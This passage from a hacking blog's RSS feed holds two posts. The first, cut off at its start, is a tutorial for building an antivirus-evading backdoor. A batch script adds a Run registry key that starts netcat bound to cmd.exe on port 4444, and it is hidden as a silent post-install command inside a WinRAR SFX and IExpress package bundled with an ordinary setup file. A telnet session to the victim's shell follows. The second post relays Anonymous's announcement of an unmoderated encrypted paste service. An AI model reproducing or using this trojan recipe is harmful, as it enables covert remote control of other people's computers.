&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;goto error&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;:regedit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\rcat.exe -L -d -p 4444 -t -e cmd.exe"&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;if errorlevel 0 goto ip&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;:error&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;echo something wrong with the program.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;goto end&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;:ip&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;echo write down the IP address from the table&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;ipconfig&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;:end&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;echo end.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;nc -L -p 4444 -t&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Open a notepad and than save it to name.bat&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Download rcat and then copy rcat.exe into the same directory where name.bat exist&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Now we use winrar to combine these two file, select both and then right click on &lt;b&gt;add to archive&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://1.bp.blogspot.com/-4VmB0fWIlZw/T5gXiRjidGI/AAAAAAAABJ8/3sWOIqewW3M/s1600/Howtobypass5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-4VmB0fWIlZw/T5gXiRjidGI/AAAAAAAABJ8/3sWOIqewW3M/s400/Howtobypass5.jpg" width="387" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;On the next window mark check on &lt;b&gt;create SFX archive&lt;br /&gt; &lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Go to &lt;b&gt;advance tab &lt;/b&gt;and click on &lt;b&gt;SFX option&lt;br /&gt; &lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Fill out the options like at the figure below&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://3.bp.blogspot.com/-1vgljA-qN9U/T5gX9t7378I/AAAAAAAABKE/gxJmDV9iEnI/s1600/Howtobypass6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-1vgljA-qN9U/T5gX9t7378I/AAAAAAAABKE/gxJmDV9iEnI/s400/Howtobypass6.jpg" width="395" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Change the tab to &lt;b&gt;modes &lt;/b&gt;and place mark of &lt;b&gt;hide all&lt;br /&gt; &lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Almost done click OK than OK to create a file&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;New file must be appear at the same directory&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;We have combined it but now make it more compitable&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Click on the &lt;b&gt;start&lt;/b&gt; than &lt;b&gt;run &lt;/b&gt;and type &lt;b&gt;iexpress&lt;br /&gt; &lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;iexpress wizard will start, click on next, then next (leave it as default), and then where it ask about &lt;b&gt;package title &lt;/b&gt;write any title like &lt;b&gt;test&lt;br /&gt; &lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;On the next two window click leave as a default and then you need to add your files.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;You
 need to add two files like I did (see figure below) one must a .exe 
file that we have made by using above method and the second file will be
 any setup file. iexpress combines them to make one.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit; text-align: center;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;img alt="" height="80%" src="http://resources.infosecinstitute.com/wp-content/uploads/011812_2037_Howtobypass7.jpg?d9c344" width="80%" /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="font-family: inherit; text-align: left;"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;On the next window there will be two options, on the &lt;b&gt;install program&lt;/b&gt; select the simple setup and on the &lt;b&gt;post install command &lt;/b&gt;select the backdoor.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;On the next window place mark on &lt;b&gt;hidden &lt;/b&gt;then click next&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Enter the name of the final file and place mark on first option (see figure below )&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;img alt="" height="80%" src="http://resources.infosecinstitute.com/wp-content/uploads/011812_2037_Howtobypass8.jpg?d9c344" width="80%" /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;On next window &lt;b&gt;no restart &lt;/b&gt;and&lt;b&gt;&lt;br /&gt; &lt;/b&gt;then &lt;b&gt;don’t save, &lt;/b&gt;on the last create the package.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Your new file must be appear on the same directory and here is the &lt;a href="http://www.virustotal.com/file-scan/report.html?id=d3b3f4dcaf1e13bb8af1d546a4c6b2a86fc6906e89f8bd70319bd4d71f5c8a95-1324752212" rel="nofollow" style="color: blue;" target="_blank"&gt;report&lt;/a&gt;.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;New file has an ability to bypass the most famous antivirus software and it has contained our back door. &lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;/div&gt;
&lt;h3 style="font-family: inherit;"&gt;



&lt;span style="font-size: small;"&gt;&lt;b&gt;Result&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Let’s suppose our victim has executed the file. Now we can easily get the response via our command promote or terminal.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;root@bt:~# telnet 192.168.1.8&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Trying 192.168.1.8...&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;telnet: Unable to connect to remote host: Connection refused&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;root@bt:~# telnet 192.168.1.8 23&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Trying 192.168.1.8...&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;telnet: Unable to connect to remote host: Connection refused&lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Why does it fail? Because our Netcat opened port number 4444. Look at the batch file code. Now check again.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;root@bt:~# telnet 192.168.1.8 4444&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Trying 192.168.1.8...&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Connected to 192.168.1.8.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Escape character is '^]'.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Microsoft Windows XP [Version 5.1.2600]&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(C) Copyright 1985-2001 Microsoft Corp.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;C:\Documents and Settings\Blacksheep&amp;gt;&lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;You can use nc instead of telnet.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit; text-align: center;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;img alt="" src="http://resources.infosecinstitute.com/wp-content/uploads/011812_2037_Howtobypass9.jpg?d9c344" /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: red;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-2791460264773474227?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=oBgtz1EAipU:vHEu7lmo5pM:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=oBgtz1EAipU:vHEu7lmo5pM:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=oBgtz1EAipU:vHEu7lmo5pM:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=oBgtz1EAipU:vHEu7lmo5pM:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=oBgtz1EAipU:vHEu7lmo5pM:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=oBgtz1EAipU:vHEu7lmo5pM:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=oBgtz1EAipU:vHEu7lmo5pM:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=oBgtz1EAipU:vHEu7lmo5pM:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=oBgtz1EAipU:vHEu7lmo5pM:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=oBgtz1EAipU:vHEu7lmo5pM:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=oBgtz1EAipU:vHEu7lmo5pM:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=oBgtz1EAipU:vHEu7lmo5pM:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=oBgtz1EAipU:vHEu7lmo5pM:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/oBgtz1EAipU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/oBgtz1EAipU/how-to-create-fud-backdoor-bypass.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-qRvBboKnzmE/T5gZOQyZL2I/AAAAAAAABKM/-U5Pi80-Tkw/s72-c/netcat.gif" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/04/how-to-create-fud-backdoor-bypass.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-6916282602475408045</guid><pubDate>Sun, 22 Apr 2012 19:02:00 +0000</pubDate><atom:updated>2012-04-22T12:03:36.262-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><category domain="http://www.blogger.com/atom/ns#">Anonymous</category><title>AnonBin The Anonymous Alternate of Pastebin</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/fQNOcKNFOKxFv5U370JZSl-6tPw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/fQNOcKNFOKxFv5U370JZSl-6tPw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/fQNOcKNFOKxFv5U370JZSl-6tPw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/fQNOcKNFOKxFv5U370JZSl-6tPw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;


 
 
 
 &lt;/span&gt;&lt;/b&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;

&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/04/anonbinthe-anonymous-alternate-of.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://2.bp.blogspot.com/-QqQQFQPBIyU/T5PO87UBbzI/AAAAAAAABJw/613jQMksw6w/s200/anon.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.ehacking.net/search/label/Anonymous" style="color: blue;"&gt;Anonymous&lt;/a&gt; the famous hacktivist group
has announced the alternate of pastebin, a pastebin is web
application that allows you to paste and share the text file. The
official release of Anonymous and the Peoples Liberation Front states
that:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq" style="font-family: inherit;"&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Anonymous and the Peoples Liberation Front are proud to announce a 
totally secure and safe alternative to the now infamous PasteBin 
service.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;AnonPaste - www.AnonPaste.tk&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;As many might be aware, PasteBin has been in the news lately for making 
some rather shady claims as to what they are willing to censor, and when
 they are willing to give up IP addresses to the authorities. And as a 
recent leak of private E-Mails show clearly, PasteBin is not only 
willing to give up IP addresses to governments - but apparently has 
already given many IPs to at least one private security firm. And these 
leaked E-Mail's also revealed a distinct animosity towards Anonymous. 
And so the PLF and Anonymous have teamed up to offer a paste service 
truly free of all such nonsense. Here is a brief list of some of the 
features of AnonPaste:&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;1) No connection logs, period.&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;2) All pastes are encrypted BY THE BROWSER using 256 bit AES encryption.
 This means there is no usable paste data stored on the server for the 
authorities or anyone else to seize.&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;3) No moderation or censorship. Because the data on our servers is 
unreadable by us (or anyone), the responsibility for the legality or 
appropriateness of any paste lies solely with the person posting. So 
there will be no need for us to police this service, and in fact we 
don't even have the ability of deleting any particular paste.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;4) No advertisements. This service will be totally user supported 
through donations. Links for this are available on the web site.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;5) Built in URL shortener for the convenience of people posting.&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Paste services have become very popular, and many people want to post 
controversial material. This is especially so for those involved in 
Information Activism. We feel that it is essential that everyone, and 
especially those in the movement - have a safe and secure paste service 
that they can trust with their valuable and often politically sensitive 
material. As always, we believe in the radical notion that information 
should be free.&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;SIGNED -- Anonymous and the Staff of the Peoples Liberation Front 

PLF - www.PeoplesLiberationFront.net&amp;nbsp; &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 0in;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Here are 2 links to it.&lt;br /&gt;
&lt;a href="http://www.blogger.com/goog_871057835"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;a href="http://expect-us.net/paste/" target="_blank"&gt;http://expect-us.net/paste/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
or&lt;/span&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;
&lt;a href="http://www.blogger.com/goog_871057841" target="_blank"&gt;http://anonbin.tk/&lt;/a&gt;&lt;/span&gt;
&lt;span style="font-size: small;"&gt;&lt;a href="http://anonbin.tk/%20" target="_blank"&gt; &lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;
&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span class="st_twitter_large" displaytext="Tweet"&gt;&lt;/span&gt;&lt;span class="st_facebook_large" displaytext="Facebook"&gt;&lt;/span&gt;&lt;span class="st_ybuzz_large" displaytext="Yahoo! Buzz"&gt;&lt;/span&gt;&lt;span class="st_gbuzz_large" displaytext="Google Buzz"&gt;&lt;/span&gt;&lt;span class="st_email_large" displaytext="Email"&gt;&lt;/span&gt;&lt;span class="st_sharethis_large" displaytext="ShareThis"&gt;&lt;/span&gt;  
&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: red; font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;&lt;b&gt;RSS feed&lt;/b&gt;&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;&lt;b&gt;Facebook fan&lt;/b&gt;&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-6916282602475408045?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
